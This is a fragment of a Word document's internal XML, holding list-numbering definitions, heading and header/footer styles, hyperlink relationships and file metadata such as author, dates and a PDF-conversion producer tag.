    <w:lvl w:ilvl="6" w:tplc="239A3C4A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6056" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6D8885EC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6972" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1C1482FE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7888" w:hanging="202"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0F2952C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="54D0113A"/>
    <w:lvl w:ilvl="0" w:tplc="5AAA7EC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AF48E270">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1944" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="911C5DAA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2808" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A38487F4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3672" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="19BEFA58">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4536" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AAC620B2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9F364B74">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6264" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2924CBF2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7128" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="931E5FC4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7992" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1618455B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBB2B342"/>
    <w:lvl w:ilvl="0" w:tplc="59C8E7C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="512" w:hanging="152"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="95"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8724D596">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="86"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="6234D172">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A73AD9E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3000" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AC70CC18">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="60A4F8A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4920" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A650F91C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5A2A612E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7A1057C4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40F52760"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9006D45C"/>
    <w:lvl w:ilvl="0" w:tplc="7A7E980E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsia="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B68A670E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2484" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="20C6922E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3288" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="81421F6C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4092" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E2128128">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4896" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6ABAE1C6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="21169202">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6504" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F0101850">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7308" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F8B61E52">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8112" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A2F7BE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D04C996"/>
    <w:lvl w:ilvl="0" w:tplc="FE04792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37B6C98E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1944" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C4161624">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2808" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CAB056FC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3672" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8BA0DB8A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4536" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B7B05270">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="001A3376">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6264" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B13E09AE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7128" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B7B677A6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7992" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1055853383">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1562476462">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="932471279">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="385689117">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1742677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34D15"/>
    <w:rsid w:val="00034D15"/>
    <w:rsid w:val="000B28F5"/>
    <w:rsid w:val="00B21C16"/>
    <w:rsid w:val="00C65DAF"/>
    <w:rsid w:val="00C97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A566E"/>
  <w15:docId w15:val="{44619F0A-4821-4124-A763-7614E0A4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
      <w:ind w:left="360"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="360"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="3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B21C16"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B21C16"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B21C16"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B21C1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facebook.com/"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hyperlink" Target="http://127.0.0.1/" TargetMode="External"/><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 TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.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1220</Words>
  <Characters>6959</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>57</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Rushikesh Mhaske</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-12T18:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-12T19:00:00Z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2025-03-12T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="LastSaved">
    <vt:filetime>2025-03-12T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Producer">
    <vt:lpwstr>iLovePDF</vt:lpwstr>
  </property>
</Properties>
</file>